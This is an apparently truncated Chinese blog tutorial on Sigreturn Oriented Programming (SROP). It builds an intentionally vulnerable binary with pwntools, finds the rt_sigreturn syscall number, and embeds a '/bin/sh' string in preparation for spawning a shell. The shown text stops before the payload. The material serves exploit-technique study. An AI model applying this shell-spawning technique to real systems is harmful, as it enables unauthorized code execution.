SROP Sigreturn Oriented Programming (SROP), a novel technique for exploits and backdoors in UNIX-like systems. 具体见[1]。 漏洞程序 vuln程序 from pwn import * context.arch = 'amd64' context.os = 'linux' elf = ELF.from_assembly( ''' mov rdi, 0; mov rsi, rsp; sub rsi, 8; mov rdx, 500; syscall; ret; pop rax; ret; ''', vma=0x41000 ) elf.save('vuln') └─$ cat /usr/include/asm/unistd_64.h | grep -i sigreturn -A2 #define __NR_rt_sigreturn 15 #define __NR_ioctl 16 #define __NR_pread64 17 嵌入shell地址 ┌──(kali㉿kali)-[~/exploits/srop] └─$ echo -en "/bin/sh\x00" >> vuln ┌──(k……

阅读全文